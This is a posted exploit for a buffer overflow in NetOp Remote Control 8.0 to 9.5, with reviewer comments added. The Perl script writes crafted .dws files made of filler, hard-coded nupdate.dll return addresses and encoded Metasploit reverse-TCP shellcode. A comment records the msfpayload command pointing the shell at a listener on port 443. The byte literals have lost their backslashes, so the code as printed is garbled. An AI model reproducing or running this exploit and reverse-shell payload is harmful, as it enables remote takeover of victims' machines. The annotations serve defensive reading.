
NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 Buffer Overflow

Posted on 29 April 2011

# Exploit Title: NetOp Remote Control Buffer Overflow
# Date: April 28, 2011
# Author: chap0
# Version: 8.0, 9.1, 9.2, 9.5 (Possibly anything before ver 10)
# Upgrade to Version 10 for fix
# Tested on: Windows XP SP3
#
# Greetz to JJ IE by day Ninja by night, br34dcrumb5, myne-us, Exploit-DB, Corelan
#
#
#!/usr/bin/perl
#
# Purpose: proof-of-concept file generator. It asks which NetOp version is
# targeted and writes one file (netop80/91/92/95.dws) built from four parts:
# a filler string, a 4-byte value annotated as an address in nupdate.dll,
# a second filler string, and an encoded payload.
#
# Reading notes for defenders:
#   * The only remediation the author states is upgrading to version 10.
#   * The page does not say which NetOp component parses the .dws file or how
#     it reaches the victim -- presumably it has to be opened by a vulnerable
#     build; verify against the vendor advisory.
#   * Each version uses one hard-coded address inside nupdate.dll, which
#     suggests the technique relies on that module loading at a fixed base.
#     The test platform (Windows XP SP3) has no ASLR; whether newer platforms
#     are affected the same way cannot be told from this listing.
#
# NOTE(review): every byte string on this page is printed without backslashes
# (e.g. "x41"), presumably stripped when the page was rendered. Taken
# literally they are plain ASCII text, so sizes quoted in the comments
# (such as "size 341") do not match the literals as shown.
# NOTE(review): no `use strict` / `use warnings`; $file0..$file3 and $select
# are package globals.

# Output file names, one per supported product version.
$file0 = "netop80.dws";
$file1 = "netop91.dws";
$file2 = "netop92.dws";
$file3 = "netop95.dws";

# Filler placed in front of the version-specific 4-byte value: the string is
# repeated 524 times.
my $junk="x41" x 524;

# Version-specific 4-byte values. The trailing comments give the address each
# one encodes (written least-significant byte first) and the module it is in.
my $ret0 = "x9BxC2x40x20"; #0x2040C29B [nupdate.dll]
my $ret1 = "xB3xE9x3Dx20"; #0x203DE9B3 [nupdate.dll]
my $ret2 = "x1BxFCx44x20"; #0x2044FC1B [nupdate.dll]
my $ret3 = "x13x26xB5x20"; #0x20B52613 [nupdate.dll]

# Second filler, repeated 20 times, placed between the address and the payload.
my $extra = "x41" x 20;

# The two comments below are the author's record of how the payload was
# produced: a Metasploit reverse TCP shell aimed at a private (RFC 1918)
# address on port 443, encoded to avoid the listed bad characters. On a host
# where this ran, the observable effect would presumably be an outbound
# connection from the NetOp process to the configured listener -- TODO confirm.
#./msfpayload windows/shell_reverse_tcp LHOST=172.16.20.27 LPORT=443 R | msfencode -a x86 -b 'x00x0ax0d' -t perl
#[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
my $shellcode=
"xb8x34xc1xf5xccxdbxd1xd9x74x24xf4x5ax33xc9" .
"xb1x4fx31x42x14x03x42x14x83xc2x04xd6x34x09" .
"x24x9fxb7xf2xb5xffx3ex17x84x2dx24x53xb5xe1" .
"x2ex31x36x8ax63xa2xcdxfexabxc5x66xb4x8dxe8" .
"x77x79x12xa6xb4x18xeexb5xe8xfaxcfx75xfdxfb" .
"x08x6bx0exa9xc1xe7xbdx5dx65xb5x7dx5cxa9xb1" .
"x3ex26xccx06xcax9cxcfx56x63xabx98x4ex0fxf3" .
"x38x6exdcxe0x05x39x69xd2xfexb8xbbx2bxfex8a" .
"x83xe7xc1x22x0exf6x06x84xf1x8dx7cxf6x8cx95" .
"x46x84x4ax10x5bx2ex18x82xbfxcexcdx54x4bxdc" .
"xbax13x13xc1x3dxf0x2fxfdxb6xf7xffx77x8cxd3" .
"xdbxdcx56x7ax7dxb9x39x83x9dx65xe5x21xd5x84" .
"xf2x53xb4xc0x37x69x47x11x50xfax34x23xffx50" .
"xd3x0fx88x7ex24x6fxa3xc6xbax8ex4cx36x92x54" .
"x18x66x8cx7dx21xedx4cx81xf4xa1x1cx2dxa7x01" .
"xcdx8dx17xe9x07x02x47x09x28xc8xfex0exbfx5f" .
"x10x84x5bxc8x13xa4x5axb3x9dx42x36xd3xcbxdd" .
"xafx4ax56x95x4ex92x4cx3dxf2x01x0bxbdx7dx3a" .
"x84xeax2ax8cxddx7exc7xb7x77x9cx1ax21xbfx24" .
"xc1x92x3exa5x84xafx64xb5x50x2fx21xe1x0cx66" .
"xffx5fxebxd0xb1x09xa5x8fx1bxddx30xfcx9bx9b" .
"x3cx29x6ax43x8cx84x2bx7cx21x41xbcx05x5fxf1" .
"x43xdcxdbx01x0ex7cx4dx8axd7x15xcfxd7xe7xc0" .
"x0cxeex6bxe0xecx15x73x81xe9x52x33x7ax80xcb" .
"xd6x7cx37xebxf2";

# Banner and version menu. The page collapsed this heredoc onto one line; the
# line breaks inside it are reconstructed and may differ from the original.
print<<EOF;
NetOp Remote Control Buffer Overflow
By chap0 - www.seek-truth.net
Choose a number for the version of NetOp are you attacking:
0 - NetOp 8.0
1 - NetOp 9.1
2 - NetOp 9.2
3 - Netop 9.5
EOF

# Read the operator's menu choice from standard input, without the newline.
print "Selection: ";
chomp ($select = <STDIN>);

# Each branch concatenates filler + version-specific address + filler +
# payload and writes the result to that version's file.
# NOTE(review): `=~` is a pattern match, not an equality test, so any input
# that merely contains the digit selects the branch.
# NOTE(review): open() is the two-argument form on a bareword handle and its
# result is never checked; a failed open is silent and "Done." still prints.
if ($select =~ 0) {
print "Creating payload for NetOp 8.0 ";
my $payload=$junk.$ret0.$extra.$shellcode;
open(FILE,">$file0");
print FILE $payload;
close(FILE);
print "Done. ";
}
elsif ($select =~ 1) {
print "Creating payload for NetOp 9.1 ";
my $payload=$junk.$ret1.$extra.$shellcode;
open(FILE,">$file1");
print FILE $payload;
close(FILE);
print "Done. ";
}
elsif ($select =~ 2) {
print "Creating payload for NetOp 9.2 ";
my $payload=$junk.$ret2.$extra.$shellcode;
open(FILE,">$file2");
print FILE $payload;
close(FILE);
print "Done. ";
}
elsif ($select =~ 3) {
print "Creating payload for NetOp 9.5 ";
my $payload=$junk.$ret3.$extra.$shellcode;
open(FILE,">$file3");
print FILE $payload;
close(FILE);
print "Done. ";
}
# Matching against an empty pattern; this looks intended to catch empty input
# but presumably behaves as a catch-all for anything without 0-3 -- verify.
elsif ($select =~ '') {
print "Please make a selection. ";
}

 
